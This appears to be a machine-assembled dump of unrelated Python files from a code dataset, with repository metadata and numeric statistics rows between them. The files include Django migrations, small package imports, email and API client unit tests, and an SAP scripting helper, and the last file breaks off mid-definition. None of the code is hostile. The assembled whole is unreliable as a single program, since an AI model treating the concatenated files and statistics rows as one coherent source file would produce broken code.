('section_content', wagtail.core.fields.StreamField([('text', wagtail.core.blocks.RichTextBlock()), ('partners', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('name', wagtail.core.blocks.CharBlock(blank=True, max_length=25)), ('link', wagtail.core.blocks.CharBlock(blank=True, max_length=255)), ('logo', wagtail.images.blocks.ImageChooserBlock())])))], blank=True)),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='IndexBlurbES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('section_name', models.CharField(blank=True, max_length=50)),
('section_content', wagtail.core.fields.StreamField([('text', wagtail.core.blocks.RichTextBlock()), ('partners', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('name', wagtail.core.blocks.CharBlock(blank=True, max_length=25)), ('link', wagtail.core.blocks.CharBlock(blank=True, max_length=255)), ('logo', wagtail.images.blocks.ImageChooserBlock())])))], blank=True)),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.RemoveField(
model_name='indexblurb',
name='article',
),
migrations.RenameField(
model_name='homepage',
old_name='title_tip_drugs',
new_name='title_lead_en',
),
migrations.RenameField(
model_name='homepage',
old_name='title_tip_me',
new_name='title_lead_es',
),
migrations.AddField(
model_name='homepage',
name='title_tip_drugs_en',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_drugs_es',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_me_en',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='homepage',
name='title_tip_me_es',
field=models.CharField(blank=True, max_length=255),
),
migrations.DeleteModel(
name='IndexBlurb',
),
migrations.AddField(
model_name='indexblurbes',
name='article',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='index_sections_es', to='home.HomePage'),
),
migrations.AddField(
model_name='indexblurben',
name='article',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='index_sections_en', to='home.HomePage'),
),
]
| 42.543478 | 400 | 0.602197 | 396 | 3,914 | 5.780303 | 0.247475 | 0.067278 | 0.081695 | 0.078637 | 0.75841 | 0.75841 | 0.75841 | 0.75841 | 0.75841 | 0.6872 | 0 | 0.019689 | 0.260347 | 3,914 | 91 | 401 | 43.010989 | 0.770984 | 0.011497 | 0 | 0.623529 | 1 | 0 | 0.135764 | 0.005948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.070588 | 0 | 0.105882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e7c976d4f2a066a6a8d1ba80dfb73b2421211f0b | 27 | py | Python | database/__init__.py | markmelnic/Carsen-Logic | 7a43f465e61f2e8713d04395877dfaf00a0f663e | [
"MIT"
] | 1 | 2021-09-05T10:50:42.000Z | 2021-09-05T10:50:42.000Z | database/__init__.py | markmelnic/Carsen-Crawler | 6f5a7b7b7ba7cdad04c0dd30a53d17239dda6965 | [
"MIT"
] | null | null | null | database/__init__.py | markmelnic/Carsen-Crawler | 6f5a7b7b7ba7cdad04c0dd30a53d17239dda6965 | [
"MIT"
] | 4 | 2020-10-31T14:09:01.000Z | 2022-01-13T20:48:37.000Z | from database.db import DB
| 13.5 | 26 | 0.814815 | 5 | 27 | 4.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# File: models/contextuals/__init__.py (repo: datactivist/dataoutai, license: MIT)
from .sbert import ContextualEmbeddingModel
# File: samples/sample_enum_names.py (repo: NobuyukiInoue/Example_dnspython, license: MIT)
import dns.e164
n = dns.e164.from_e164("+1 555 1212")
print(n)
print(dns.e164.to_e164(n))
# File: python/6_kyu/data_reverse.py (repo: CommonLouis/CodeWars_Solutions, license: MIT)
"""
Michael Persico
Oct.09, 2021
Data Reverse
https://www.codewars.com/kata/569d488d61b812a0f7000015
"""
def data_reverse(data):
return sum([data[i:i + 8] for i in range(0,len(data), 8)][::-1], [])
if __name__ == "__main__":
print(data_reverse([1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,1,0,1,0,1,0])) # [1,0,1,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1]
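The kata solution above splits the flat bit list into 8-bit chunks and reverses the chunk order. A minimal self-contained sketch of that behaviour on a short two-byte input (the example values are illustrative, not from the kata):

```python
# Split a flat bit list into 8-bit chunks, reverse the chunk order,
# and flatten back into one list -- the same approach as data_reverse above.
def data_reverse(data):
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    return sum(chunks[::-1], [])

bits = [1] * 8 + [0] * 8  # two bytes: all ones, then all zeros
print(data_reverse(bits))  # → [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1]
```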
# File: graphgallery/functional/edge_level/__init__.py (repo: dongzizhu/GraphGallery, license: MIT)
from .transform import *
# File: cvpl-xml/xml/exceptions.py (repo: robinsax/canvas-plugin-multirepo, license: Apache-2.0)
# coding: utf-8
'''
Exceptions.
'''
class XMLSyntaxError(Exception): pass
class ConversionError(Exception): pass
# File: octicons16px/file_diff.py (repo: andrewp-as-is/octicons16px.py, license: Unlicense)
OCTICON_FILE_DIFF = """
<svg class="octicon octicon-file-diff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M2.75 1.5a.25.25 0 00-.25.25v12.5c0 .138.112.25.25.25h10.5a.25.25 0 00.25-.25V4.664a.25.25 0 00-.073-.177l-2.914-2.914a.25.25 0 00-.177-.073H2.75zM1 1.75C1 .784 1.784 0 2.75 0h7.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0113.25 16H2.75A1.75 1.75 0 011 14.25V1.75zm7 1.5a.75.75 0 01.75.75v1.5h1.5a.75.75 0 010 1.5h-1.5v1.5a.75.75 0 01-1.5 0V7h-1.5a.75.75 0 010-1.5h1.5V4A.75.75 0 018 3.25zm-3 8a.75.75 0 01.75-.75h4.5a.75.75 0 010 1.5h-4.5a.75.75 0 01-.75-.75z"></path></svg>
"""
# File: config/__init__.py (repo: AlexanderFengler/LAN_scripts, license: MIT)
from .config_utils import *
# File: queen.py (repo: omerihtizaz/chess-AI, license: MIT)
from bishop import *
from rook import *
def getQueenMovements(board, player):
return joinList(getBishopMovements(board, player), getRookMovements(board, player))
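`getQueenMovements` simply takes the union of the bishop's and rook's move sets. A hedged, self-contained sketch of that idea with stand-in move lists (`joinList` is assumed to concatenate, and the coordinate values are placeholders, not from the repo):

```python
# The queen's moves are the bishop's diagonal moves plus the rook's
# straight moves; joinList is assumed to be plain list concatenation.
def joinList(a, b):
    return a + b

bishop_moves = [(1, 1), (2, 2)]  # hypothetical diagonal targets
rook_moves = [(1, 0), (0, 1)]    # hypothetical straight targets
queen_moves = joinList(bishop_moves, rook_moves)
print(queen_moves)  # → [(1, 1), (2, 2), (1, 0), (0, 1)]
```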
# File: src/po/GithubPO.py (repo: d9nchik/selenium, license: MIT)
import src.po.DefaultPO as dpo
class GithubPO(dpo.DefaultPO):
pass
# File: tensorcv/__init__.py (repo: Hourout/tensorcv, license: Apache-2.0)
from tensorcv import Classification
from tensorcv import image
from tensorcv import data
from tensorcv import losses
__version__ = '0.2.0'
__author__ = 'JinQing Lee'
# File: paloma/tests/mail.py (repo: piquadrat/paloma, license: Apache-2.0)
import os
from paloma import Mail, TemplateMail
from django.core import mail
from django.test.utils import override_settings
from .testcase import TestCase
TEMPLATE_DIRS = (os.path.join(os.path.abspath(os.path.dirname(__file__)),
'templates'), )
@override_settings(DEFAULT_FROM_EMAIL='default@example.com',
DEFAULT_FROM_NAME='Default sender')
class MailTestCase(TestCase):
"""Test case for :class:`Mail`.
"""
def assertSimple(self, sent, **kwargs):
self.assertEqual(sent.subject,
kwargs.pop('subject', 'Subject of the e-mail'))
self.assertEqual(sent.body, kwargs.pop('body', 'Body of the e-mail'))
from_email = kwargs.pop('from_email', 'default@example.com')
from_name = kwargs.pop('from_name', 'Default sender')
if from_name:
self.assertEqual(sent.from_email, '%s <%s>' % (from_name,
from_email))
else:
self.assertEqual(sent.from_email, from_email)
self.assertEqual(len(sent.to), 1)
self.assertEqual(sent.to[0], kwargs.pop('to', 'test@example.com'))
        html_alternatives = [a for a in sent.alternatives
                             if a[1] == 'text/html']
self.assertEqual(any(html_alternatives), 'html_body' in kwargs)
if 'html_body' in kwargs:
html_body = kwargs.pop('html_body')
actual_html_body, mime_type = html_alternatives[0]
self.assertEqual(html_body, actual_html_body)
def test_init__defaults_to_setting_for_from_email_and_from_name(self):
"""Mail().__init__(from_name=None, from_email=None) uses defaults
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
# Test with global.
with override_settings(DEFAULT_FROM_EMAIL='someone@example.com',
DEFAULT_FROM_NAME='Someone'):
m = TestMail()
self.assertEqual(m.from_email, 'someone@example.com')
self.assertEqual(m.from_name, 'Someone')
with self.assertMailsSent(1):
m.send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1],
from_email='someone@example.com',
from_name='Someone')
def test_send__respects_from_email_ivar_from_sent(self):
"""Mail().send(..) respects from_email instance variable
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
from_email = 'from@example.com'
# Test without global.
with override_settings(DEFAULT_FROM_EMAIL=None):
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_email='from@example.com')
# Test with global.
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_email='from@example.com')
def test_send__respects_from_name_ivar_from_sent(self):
"""Mail().send(..) respects from_name instance variable
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
from_name = 'Overridden'
# Test without global.
with override_settings(DEFAULT_FROM_NAME=None):
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_name='Overridden')
# Test with global.
with self.assertMailsSent(1):
TestMail().send('test@example.com', 'Body of the e-mail')
self.assertSimple(mail.outbox[-1], from_name='Overridden')
def test_send__respects_subject(self):
"""Mail().send(..) respects subject argument
"""
class TestMail(Mail):
subject = 'Not this subject of the e-mail'
with self.assertMailsSent(1):
TestMail().send('test@example.com',
'Body of the e-mail',
subject='This is the subject')
self.assertSimple(mail.outbox[-1], subject='This is the subject')
def test_send__with_html_body(self):
"""Mail().send(..) with HTML body sends both plain text and HTML body
"""
class TestMail(Mail):
subject = 'Subject of the e-mail'
html_body = '<h1>HTML body of the e-mail</h1>'
with self.assertMailsSent(1):
TestMail().send('test@example.com',
'Body of the e-mail',
html_body)
self.assertSimple(mail.outbox[-1], html_body=html_body)
@override_settings(DEFAULT_FROM_EMAIL='default@example.com',
DEFAULT_FROM_NAME='Default sender',
TEMPLATE_DIRS=TEMPLATE_DIRS)
class TemplateMailTestCase(TestCase):
"""Test case for :class:`TemplateMail`.
"""
def assertSimple(self, sent, body, **kwargs):
self.assertEqual(sent.subject,
kwargs.pop('subject', 'Subject of the e-mail'))
self.assertEqual(sent.body, body)
from_email = kwargs.pop('from_email', 'default@example.com')
from_name = kwargs.pop('from_name', 'Default sender')
if from_name:
self.assertEqual(sent.from_email, '%s <%s>' % (from_name,
from_email))
else:
self.assertEqual(sent.from_email, from_email)
self.assertEqual(len(sent.to), 1)
self.assertEqual(sent.to[0], kwargs.pop('to', 'test@example.com'))
        html_alternatives = [a for a in sent.alternatives
                             if a[1] == 'text/html']
self.assertEqual(any(html_alternatives), 'html_body' in kwargs)
if 'html_body' in kwargs:
html_body = kwargs.pop('html_body')
actual_html_body, mime_type = html_alternatives[0]
self.assertEqual(html_body, actual_html_body)
def test_send__only_text_template(self):
"""TemplateMail(<only text template>).send(..) sends expected e-mail
"""
# Local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail().send('test@example.com', {'a': 'in local context'})
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in local context.')
# Class context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com')
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in class context.')
# Class and local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
text_template_name = 'test_mail.txt'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com',
{'a': 'in local context'})
self.assertSimple(mail.outbox[-1],
body=u'Test body.\n\nHas variable in local context.')
def test_send__templated(self):
"""TemplateMail(<templated>).send(..) sends expected e-mail
"""
# Local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail().send('test@example.com', {'a': 'in local context'})
body_format = u'Test body.\n\nHas variable %s.'
html_body_format = u'''<html>
<body>
<p>Test body.</p>
<p>Has variable %s.</p>
</body>
</html>'''
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in local context',
body=body_format % ('in local context'),
html_body=html_body_format % ('in local context')
)
# Class context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com')
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in class context',
body=body_format % ('in class context'),
html_body=html_body_format % ('in class context')
)
# Class and local context variable.
class TestMail(TemplateMail):
subject = 'Subject of the e-mail'
subject_template_name = 'test_mail_subject.txt'
text_template_name = 'test_mail.txt'
html_template_name = 'test_mail.html'
with self.assertMailsSent(1):
TestMail(context={'a': 'in class context'}) \
.send('test@example.com',
{'a': 'in local context'})
self.assertSimple(
mail.outbox[-1],
subject=u'Test subject with variable in local context',
body=body_format % ('in local context'),
html_body=html_body_format % ('in local context')
)
__all__ = (
'MailTestCase',
'TemplateMailTestCase',
)
# File: CJIC.py (repo: LeandroPOliveira/SAP-Scripting, license: MIT)
# Import the pandas package to work with Excel files
import pandas as pd
# Open the script file generated by SAP
arquivo = open('CJIC.vbs', 'a')  # 'a' (append) mode adds new data to the file without deleting existing content
# Open the file with the data to be posted
dados = pd.read_excel('CJIC.xlsx', dtype=str)
# Iterate over the rows of the Excel file and fetch the data needed for the script
for index, row in dados.iterrows():
    # Add the data to the script
arquivo.write(f'''
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "CJIC"
session.findById("wnd[0]").sendVKey 0
session.findById("wnd[0]/usr/ctxtCN_PSPNR-LOW").text = "RSG.22.001.022.1.01.1"
session.findById("wnd[0]/usr/ctxtCN_ACTVT-LOW").text = ""
session.findById("wnd[0]/usr/ctxtP_DISVAR").text = "/IMOB_OBJETO"
session.findById("wnd[0]/usr/ctxtP_DISVAR").setFocus
session.findById("wnd[0]/usr/ctxtP_DISVAR").caretPosition = 12
session.findById("wnd[0]/tbar[1]/btn[8]").press
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").setCurrentCell -1,"POBID"
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").selectColumn "POBID"
session.findById("wnd[0]/tbar[1]/btn[29]").press
session.findById("wnd[1]/usr/ssub%_SUBSCREEN_FREESEL:SAPLSSEL:1105/ctxt%%DYN001-LOW").text = "7010083 0010"
session.findById("wnd[1]/usr/ssub%_SUBSCREEN_FREESEL:SAPLSSEL:1105/ctxt%%DYN001-LOW").caretPosition = 12
session.findById("wnd[1]/tbar[0]/btn[0]").press
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").setCurrentCell -1,""
session.findById("wnd[0]/usr/cntlGRID1/shellcont/shell/shellcont[1]/shell").selectAll
session.findById("wnd[0]/tbar[1]/btn[13]").press
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/ctxtDKOBR-EMPGE[1,0]").text = "601201-0"
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/ctxtCOBRB-URZUO[7,0]").text = "4"
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/txtCOBRB-AQZIF[4,0]").setFocus
session.findById("wnd[0]/usr/tblSAPLKOBSTC_RULES/txtCOBRB-AQZIF[4,0]").caretPosition = 0
session.findById("wnd[0]").sendVKey 3
session.findById("wnd[0]/tbar[0]/btn[11]").press
session.findById("wnd[0]/tbar[0]/btn[3]").press
session.findById("wnd[1]/usr/btnSPOP-OPTION1").press
session.findById("wnd[0]/tbar[0]/btn[3]").press
''')
# Close the script file
arquivo.close()
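Note that the loop above iterates over the spreadsheet rows but the f-string interpolates no values from `row`, so every iteration writes the same hardcoded script block. A hedged sketch of pulling per-row values into a generated line (the column names `pep` and `order` are assumptions for illustration, not from the workbook):

```python
# Hypothetical: substitute values from each spreadsheet row into the
# SAP script instead of hardcoding them. Column names are assumed.
rows = [
    {'pep': 'RSG.22.001.022.1.01.1', 'order': '7010083 0010'},
]
for row in rows:
    line = (f'session.findById("wnd[0]/usr/ctxtCN_PSPNR-LOW").text '
            f'= "{row["pep"]}"')
    print(line)
```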
# File: venv/lib/python3.8/site-packages/poetry/core/version/requirements.py (repo: Retraces/UkraineBot, license: MIT)
/home/runner/.cache/pip/pool/d2/11/dd/e3884139b17b0a08a7b9a047150bd735a59c2e947b2451d690b1dd9f43
# File: terrascript/triton/r.py (repo: vutsalsinghal/python-terrascript, license: BSD-2-Clause)
import terrascript
class triton_fabric(terrascript.Resource):
pass
class triton_firewall_rule(terrascript.Resource):
pass
class triton_instance_template(terrascript.Resource):
pass
class triton_key(terrascript.Resource):
pass
class triton_machine(terrascript.Resource):
pass
class triton_service_group(terrascript.Resource):
pass
class triton_snapshot(terrascript.Resource):
pass
class triton_vlan(terrascript.Resource):
pass
# File: dliplib/utils/__init__.py (repo: oterobaguer/ct-dip-benchmark, license: Apache-2.0)
from dliplib.utils.params import Params
# File: dask-gateway-server/dask_gateway_server/proxy/__init__.py (repo: AndreaGiardini/dask-gateway, license: BSD-3-Clause)
from .core import Proxy
# File: scripts/helper/__init__.py (repo: lovaulonze/nice_pub_figure, license: MIT)
from . import mpl_helper  # Load mpl setting as well
from .mpl_helper import gridplots, grid_labels
from .mpl_helper import savepgf, add_img_ax
from .path_helper import root_path, script_path
from .path_helper import img_path, tex_path, build_path
from .tex_helper import clean_width_cache
# File: gnn_agglomeration/pyg_datasets/__init__.py (repo: bentaculum/gnn_agglomeration, license: MIT)
from .hemibrain_dataset_blockwise import HemibrainDatasetBlockwise  # noqa
from .hemibrain_dataset_blockwise_in_memory import HemibrainDatasetBlockwiseInMemory # noqa
from .hemibrain_dataset_random import HemibrainDatasetRandom # noqa
from .hemibrain_dataset_random_in_memory import HemibrainDatasetRandomInMemory # noqa
from .hemibrain_graph_unmasked import HemibrainGraphUnmasked # noqa
from .hemibrain_graph_masked import HemibrainGraphMasked # noqa
from . import toy_datasets
# File: app/improving_agent/models/__init__.py (repo: brettasmi/EvidARA, license: MIT)
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from improving_agent.models.async_query import AsyncQuery
from improving_agent.models.attribute import Attribute
from improving_agent.models.edge import Edge
from improving_agent.models.edge_binding import EdgeBinding
from improving_agent.models.knowledge_graph import KnowledgeGraph
from improving_agent.models.log_entry import LogEntry
from improving_agent.models.log_level import LogLevel
from improving_agent.models.message import Message
from improving_agent.models.meta_attribute import MetaAttribute
from improving_agent.models.meta_edge import MetaEdge
from improving_agent.models.meta_knowledge_graph import MetaKnowledgeGraph
from improving_agent.models.meta_node import MetaNode
from improving_agent.models.node import Node
from improving_agent.models.node_binding import NodeBinding
from improving_agent.models.q_edge import QEdge
from improving_agent.models.q_node import QNode
from improving_agent.models.query import Query
from improving_agent.models.query_constraint import QueryConstraint
from improving_agent.models.query_graph import QueryGraph
from improving_agent.models.response import Response
from improving_agent.models.result import Result
from improving_agent.models.schema2 import Schema2
from improving_agent.models.sub_attribute import SubAttribute
| 47.758621 | 74 | 0.883755 | 192 | 1,385 | 6.145833 | 0.255208 | 0.25339 | 0.350847 | 0.467797 | 0.351695 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003135 | 0.0787 | 1,385 | 28 | 75 | 49.464286 | 0.92163 | 0.042599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf795254af783d664b11ec5ae045c27293b9b117 | 3,875 | py | Python | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | tests/client/schedules_test.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | import unittest
from unittest import mock

from pydactyl import PterodactylClient


class SchedulesTests(unittest.TestCase):
    def setUp(self):
        self.api = PterodactylClient(url='dummy', api_key='dummy')

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_list_schedules(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules',
        }
        self.api.client.servers.schedules.list_schedules('srv123')
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_create_schedule(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules',
            'mode': 'POST',
            'data': {'name': 'test', 'minute': '*', 'hour': '1',
                     'day_of_week': 'pants', 'day_of_month': 'doggo',
                     'is_active': True},
        }
        self.api.client.servers.schedules.create_schedule(
            'srv123', 'test', '*', '1', 'pants', 'doggo')
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_get_schedule_details(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/3',
        }
        self.api.client.servers.schedules.get_schedule_details('srv123', 3)
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_update_schedule(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/4',
            'mode': 'POST',
            'data': {'name': 'test', 'minute': '*', 'hour': '1',
                     'day_of_week': 'pants', 'day_of_month': 'doggo',
                     'is_active': True},
        }
        self.api.client.servers.schedules.update_schedule(
            'srv123', 4, 'test', '*', '1', 'pants', 'doggo')
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_delete_schedule(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/5',
            'mode': 'DELETE',
        }
        self.api.client.servers.schedules.delete_schedule('srv123', 5)
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_create_task(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/5/tasks',
            'mode': 'POST',
            'data': {'action': 'command', 'payload': 'say Hello World',
                     'time_offset': '6'}
        }
        self.api.client.servers.schedules.create_task('srv123', 5, 'command',
                                                      'say Hello World', '6')
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_update_task(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/5/tasks/4',
            'mode': 'POST',
            'data': {'action': 'command', 'payload': 'say Hello World',
                     'time_offset': '6'}
        }
        self.api.client.servers.schedules.update_task('srv123', 5, 4, 'command',
                                                      'say Hello World', '6')
        mock_api.assert_called_with(**expected)

    @mock.patch('pydactyl.api.base.PterodactylAPI._api_request')
    def test_delete_task(self, mock_api):
        expected = {
            'endpoint': 'client/servers/srv123/schedules/5/tasks/4',
            'mode': 'DELETE',
        }
        self.api.client.servers.schedules.delete_task('srv123', 5, 4)
        mock_api.assert_called_with(**expected)


if __name__ == '__main__':
    unittest.main()
| 39.141414 | 80 | 0.586065 | 415 | 3,875 | 5.243373 | 0.166265 | 0.051471 | 0.0625 | 0.073529 | 0.84421 | 0.817555 | 0.792279 | 0.792279 | 0.752757 | 0.702206 | 0 | 0.025299 | 0.265548 | 3,875 | 98 | 81 | 39.540816 | 0.739283 | 0 | 0 | 0.547619 | 0 | 0 | 0.293161 | 0.165677 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.107143 | false | 0 | 0.035714 | 0 | 0.154762 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cf7c22dd318039cc4f2e3a5eff77c87bfeaf63d3 | 141 | py | Python | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | 1 | 2021-03-24T14:56:58.000Z | 2021-03-24T14:56:58.000Z | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | null | null | null | modular_sphere/__init__.py | mcaniot/modular_sphere | dcced596fa79f924b361c5f8384e612778e9b360 | [
"Apache-2.0"
] | null | null | null | from modular_sphere.robot_sphere import RobotSphere
from modular_sphere.simulation_manager import SimulationManager

name = 'modular_sphere'
| 28.2 | 63 | 0.879433 | 17 | 141 | 7 | 0.588235 | 0.327731 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 4 | 64 | 35.25 | 0.922481 | 0 | 0 | 0 | 0 | 0 | 0.099291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d8488dc29ae80241bee30ee1357375ddb9d76078 | 3,888 | py | Python | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 19 | 2017-11-20T22:47:12.000Z | 2021-12-23T15:56:41.000Z | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 10 | 2018-01-11T12:53:01.000Z | 2020-01-27T20:05:51.000Z | tests/http_future/unmarshall_response_test.py | sjaensch/aiobravado | d3f1eb71883b1f24c4b592917890160eb3d3cbcc | [
"BSD-3-Clause"
] | 4 | 2017-11-18T12:37:14.000Z | 2021-03-19T14:48:13.000Z | # -*- coding: utf-8 -*-
from functools import partial

import pytest
from bravado_core.exception import MatchingResponseNotFound
from bravado_core.operation import Operation
from bravado_core.response import IncomingResponse
from mock import Mock
from mock import patch

from aiobravado.exception import HTTPError
from aiobravado.http_future import unmarshal_response


def unmarshal_response_inner_factory(result):
    async def mock_umi(*args, **kwargs):
        return result
    return mock_umi


def test_5XX(event_loop):
    incoming_response = Mock(spec=IncomingResponse, status_code=500)
    operation = Mock(spec=Operation)
    with pytest.raises(HTTPError) as excinfo:
        event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
    assert excinfo.value.response.status_code == 500


@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_2XX(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse)
    incoming_response.status_code = 200
    operation = Mock(spec=Operation)
    event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
    assert incoming_response.swagger_result == 99


@patch('aiobravado.http_future.unmarshal_response_inner',
       side_effect=MatchingResponseNotFound('boo'))
